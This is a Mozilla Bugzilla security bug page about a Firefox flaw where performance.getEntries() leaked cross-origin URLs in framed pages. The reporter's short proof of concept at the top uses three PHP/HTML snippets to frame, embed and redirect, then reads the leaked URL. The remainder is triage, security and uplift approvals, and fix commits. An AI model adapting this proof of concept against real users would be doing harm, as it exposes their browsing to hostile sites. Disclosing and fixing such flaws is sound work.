A Variant of bug id 1487964: Cross-Origin URL Steal is possible using performance.getEntries()
Categories
(Core :: DOM: Performance, defect)
Tracking
()
People
(Reporter: proof131072, Assigned: valentin)
References
(Regression, )
Details
(Keywords: csectype-sop, regression, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main106+][adv-esr102.4+])
Attachments
(3 files)
|
48 bytes,
text/x-phabricator-request
|
Details | Review | |
|
48 bytes,
text/x-phabricator-request
|
pascalc
:
approval-mozilla-beta+
RyanVM
:
approval-mozilla-esr102+
tjr
:
sec-approval+
|
Details | Review |
|
209 bytes,
text/plain
|
Details |
We are able to steal Cross-Origin URL when we frame the page. This is a variant of https://bugzilla.mozilla.org/show_bug.cgi?id=1487964
PoC:
framescript.php:
<iframe src="http://pwning.click/ffembed.php"/></iframe>
ffembed.php:
<embed src="/ffscript.php">
<script>
setTimeout(function(){alert(performance.getEntriesByType("resource")[1].name)},3000);
</script>
ffscript.php:
<script>location="https://www.bing.com/search?q=test"</script>
Test on: http://pwning.click/framescript.php
I tested on Latest Firefox Nightly for Windows.
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
Assignee | |
Comment 1•2 years ago
|
||
This regressed starting with bug 1732358 which enabled fission, but the actual bug was introduced in bug 1658097.
|
|
Assignee | |
Updated•2 years ago
|
|
|
Assignee | |
Comment 2•2 years ago
|
||
|
|
Assignee | |
Comment 3•2 years ago
|
||
Depends on D156824
|
|
||
Updated•2 years ago
|
|
||
Comment 4•2 years ago
|
||
We're building the final beta of the Fx105 cycle today. Let's shoot for getting this fix into the next cycle.
|
|
Assignee | |
Comment 5•2 years ago
|
||
Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!
Security Approval Request
- How easily could an exploit be constructed based on the patch?: Relatively easily. Anyone with access or knowledge of previous vulnerabilities would be able to figure out what's wrong.
- Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: Yes
- Which older supported branches are affected by this flaw?: all
- If not all supported branches, which bug introduced the flaw?: None
- Do you have backports for the affected branches?: Yes
- If not, how different, hard to create, and risky will they be?: Easy
- How likely is this patch to cause regressions; how much testing does it need?: Low risk of functional regressions.
There is a small risk of perf regressions on pages with iframes since now we're serializing the entire loadInfo, but that's easily fixable if necessary. - Is Android affected?: Yes
|
|
||
Updated•2 years ago
|
|
||
Comment 6•2 years ago
|
||
Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!
Approved to land and uplift
|
|
||
Updated•2 years ago
|
|
|
Assignee | |
Comment 7•2 years ago
|
||
Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!
Beta/Release Uplift Approval Request
- User impact if declined: Cross origin leak of information using the performance API
- Is this code covered by automated tests?: Yes
- Has the fix been verified in Nightly?: No
- Needs manual test from QE?: No
- If yes, steps to reproduce: (we have automated testing)
- List of other uplifts needed: None
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Fixes a regression. The fix is simple.
Small chance for performance regression (in testcases with lots of iframes) since we now serialize the entire loadinfo instead of just the innerWindowID. - String changes made/needed:
- Is Android affected?: Yes
ESR Uplift Approval Request
- If this is not a sec:{high,crit} bug, please state case for ESR consideration:
- User impact if declined:
- Fix Landed on Version: 107
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky):
|
||
Comment 8•2 years ago
|
||
Always call LoadInfo::GetPerformanceStorage() r=smaug
https://hg.mozilla.org/integration/autoland/rev/ea40a2dfd016ce3b2af27e2b1e74f8f8ef72b79f
https://hg.mozilla.org/mozilla-central/rev/ea40a2dfd016
|
||
Comment 9•2 years ago
|
||
Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!
Approved for 106.0b3, thanks.
|
|
||
Comment 10•2 years ago
|
||
| uplift | ||
|
||
Updated•2 years ago
|
|
|
||
Comment 11•2 years ago
|
||
Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!
Approved for 102.4esr.
|
|
||
Comment 12•2 years ago
|
||
| uplift | ||
|
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
|
||
Comment 13•2 years ago
|
||
|
|
||
Updated•2 years ago
|
|
|
||
Updated•1 year ago
|
|
||
Comment 14•1 year ago
|
||
3 months ago, Tom Ritter [:tjr] placed a reminder on the bug using the whiteboard tag [reminder-test 2022-11-01] .
valentin, please refer to the original comment to better understand the reason for the reminder.
|
|
||
Updated•1 year ago
|
|
|
Assignee | |
Updated•1 year ago
|
|
||
Comment 15•1 year ago
|
||
Pushed by valentin.gosu@gmail.com: https://hg.mozilla.org/integration/autoland/rev/ffe05e4cf724 tests r=smaug
|
||
Comment 16•1 year ago
|
||
| bugherder | ||
Description
•